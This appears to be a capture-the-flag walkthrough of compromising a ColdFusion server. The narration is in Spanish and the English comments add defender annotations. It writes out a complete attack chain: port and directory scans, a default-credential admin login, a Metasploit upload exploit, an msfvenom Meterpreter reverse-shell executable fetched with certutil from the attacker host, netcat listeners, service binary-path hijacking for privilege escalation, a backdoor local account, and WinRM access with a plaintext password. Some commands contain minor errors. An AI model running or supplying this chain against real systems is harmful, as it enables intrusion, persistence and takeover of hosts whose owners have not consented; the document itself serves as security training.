# Aggressive scan (-A) of every TCP port (-p-) plus the NSE "vuln" script category; results are saved
# in all three formats under the basename "cold" (-oA).
# NOTE(review): --min-rate=10000 asks nmap for at least 10,000 packets per second. At that rate replies
# can be dropped and open ports missed, and the burst is easy for any IDS or flow monitor to see.
# --script-timeout=15 caps each script at 15 seconds, so slower vuln checks may end without a result.
nmap -A -p- -oA cold 172.31.1.15 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210709141735.png

# Default scripts (-sC), service/version detection (-sV) and OS detection (-O) across all TCP ports.
# NOTE(review): this reuses the -oA basename "cold" from the first scan on this page, so that scan's
# output files are overwritten; a distinct basename would keep both result sets.
nmap -sC -sV -O -p- -oA cold 172.31.1.15

# UDP scan (-sU) of all ports, written to its own "cold-udp" output set.
nmap -sU -O -p- -oA cold-udp 172.31.1.15

# Nikto web-server check against the HTTP service on port 8500.
nikto -h 172.31.1.15:8500

# Directory brute force of the same service with the dirbuster medium wordlist and 100 threads (-t 100).
# -k skips TLS certificate validation and has no effect on this plain-http URL.
# Defender note: a burst of 404 responses to a single client at this concurrency stands out in web
# access logs and is a cheap detection for content discovery.
gobuster dir -k -u http://172.31.1.15:8500/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210709141934.png

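Nos dirigimos al panel de administración de ColdFusion en http://172.31.1.15/CFIDE/administrator/ (el servicio web enumerado arriba escucha en el puerto 8500).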

Pasted image 20210709142338.png

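Iniciamos sesión con las credenciales admin:admin. Un panel de administración accesible por red con una contraseña tan fácil de adivinar es el primer fallo de la cadena.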

Entramos en los ajustes y comprobamos la versión de ColdFusion instalada.

Pasted image 20210709142817.png

# Metasploit console: select the ColdFusion CKEditor file-upload module, set the target (RHOSTS) and
# the callback address (LHOST), then run it.
# Defender note: this foothold depends on the server missing the vendor fix for that upload flaw.
# Keeping ColdFusion patched and not exposing it to untrusted networks closes this step.
use exploit/multi/http/coldfusion_ckeditor_file_upload  
set RHOSTS 172.31.1.15  
set LHOST 10.10.0.12  
run

Pasted image 20210709151956.png

# Build a Windows executable with the reverse_tcp Meterpreter payload, configured to call back to
# 10.10.0.12 on port 5555, and write it to cold_shell.exe.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.12 LPORT=5555 -f exe > cold_shell.exe

# Serve the current directory over HTTP on port 8888 so the file can be fetched from the target.
python3 -m http.server 8888

rem Run on the target: download cold_shell.exe from the attack host with the built-in certutil.exe.
rem Defender note: certutil invoked with -urlcache -f and an http URL is a well-known
rem living-off-the-land download pattern. Alert on that command line and on certutil.exe making
rem outbound network connections.
certutil.exe -urlcache -f http://10.10.0.12:8888/cold_shell.exe cold_shell.exe

Pasted image 20210709152300.png

# Listener on TCP 5555, the LPORT given to msfvenom above.
# Defender note: egress filtering that stops the server from opening connections to arbitrary
# ports would block this callback.
nc -lvnp 5555

Pasted image 20210709153029.png

# Serve the current directory over HTTP on port 8888 again, this time for the enumeration tool.
python3 -m http.server 8888

rem Run on the target: fetch winPEASany.exe (saved locally as winpease.exe) and run it to enumerate
rem local privilege-escalation paths.
rem Defender note: this is the same certutil download pattern as before. The enumeration tool is
rem widely known, so enabled endpoint protection would normally be expected to flag it.
certutil.exe -urlcache -f http://10.10.0.12:8888/winPEASany.exe winpease.exe

winpease.exe

Pasted image 20210709153548.png

rem Point the "cold" service's binary path at cold_shell.exe and start the service, so the payload
rem runs with the service's privileges rather than the current user's.
rem Defender note: this works only because the current user is allowed to reconfigure the service.
rem Restrict service configuration rights to administrators and monitor services for binary-path
rem changes.
sc config cold binpath='C:\ColdFusion2018\cfusion\bin\cold_shell.exe'

sc start cold

# Second listener on TCP 5555, for the callback triggered by starting the service.
nc -lvnp 5555

Pasted image 20210709161557.png

rem Create the local account cu3rv0x, then attempt to add it to a local administrators group.
rem Defender note: Windows security auditing records local account creation (event ID 4720) and
rem additions to local groups (event ID 4732). Alert on both, especially for privileged groups.
net user cu3rv0x /add

net localgroup cu3rv0x Administrator cu3rv0x /add

# Run whoami on the host over WinRM with CrackMapExec to confirm the account's remote access.
# NOTE(review): the password is passed in clear text on the command line, so it ends up in shell
# history and process listings.
# Defender note: limit WinRM to dedicated management hosts, so a local administrator credential
# cannot be used for remote execution from arbitrary machines.
crackmapexec winrm 172.31.1.15 -u cu3rvox -p pass12345678! -x 'whoami'

Pasted image 20210709161655.png
